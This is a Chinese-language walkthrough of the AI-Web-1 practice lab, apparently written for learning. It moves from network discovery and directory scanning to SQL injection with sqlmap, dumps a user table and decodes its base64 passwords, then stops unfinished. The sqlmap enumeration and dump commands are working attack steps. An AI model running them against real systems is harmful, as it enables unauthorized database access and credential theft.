做实验之前需要准备号Kali虚拟机和AIWeb靶场，全程在Kali上进行。

1. 使用ifconfig查看本机的ip地址192.168.69.133

2.发现ip

netdiscover -r 192.168.69.0/24

对照AIWeb的Mac地址

找到ip地址为：192.168.69.149

3.信息收集

对目标靶机端口扫描

nmap 192.168.69.149(靶机地址)

发现80端口——http

4．访问一下靶机的ip 地址，无法访问

查看网站源代码也并没有其他的页面

5. 目录扫描dirb http://192.168.69.149

访问robots.txt文件，发现他有两个不被允许访问的文件

然后分别访问这两个文件

http://192.168.69.149/m3diNf0/

http://192.168.69.149/se3reTdir777/uploads/

发现仍然是403无权访问，既然如此，用dirb命令再扫描一次两个URL

发现第一个文件下有一个info.php:  

http: //192.168.69.149/m3diNf0/info.php

访问http://192.168.69.149/m3diNf0/info.php页面，发现其中有三个绝对路径：

/home/www/html/web1x443290o2sdf92213

/home/www/html/web1x443290o2sdf92213

/home/www/html/web1x443290o2sdf92213/m3diNf0/info.php

对第二个文件进行扫描，未发现有其他文件

删除/uploads再进行扫描

发现http://192.168.69.149/se3reTdir777/index.php是一个登录窗口

使用brupsuite对这个网址进行抓包

将抓包的内容新建文件夹data.txt

然后进入存放data.txt文件夹所在的目录

用sqlmap -r data.txt进行扫描

就会看到他存在布尔盲注、报错注入、时间注入、联合注入

然后在用sqlmap -r data.txt --current-db会看到他存在的数据库’aiweb1’

使用sqlmap -r data.txt -D aiweb1 –tables查看数据库有的表名

分别用sqlmap -r data.txt -D aiweb1 -T user –columns

sqlmap -r data.txt -D aiweb1 -T systemUser –columns

查看两个表的信息

使用sqlmap -r data.txt -D aiweb1 -T systemUser -C "id,password,userName" --dump –batch查看sys表中的信息

id | password                                     | userName  |

+----+----------------------------------------------+-----------+

| 1  | RmFrZVVzZXJQYXNzdzByZA==                     | t00r      |

| 2  | TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== | aiweb1pwn |

| 3  | TjB0VGhpczBuZUFsczA=                         | u3er      |

发现这些密码是base64,用base64.us进行解码，得到对应的密码如下：

t00r: FakeUserPassw0rd

aiweb1pwn :MyEvilPass_f908sdaf9_sadfasf0sa

u3er: N0tThis0neAls0

后续还有步骤还未完成。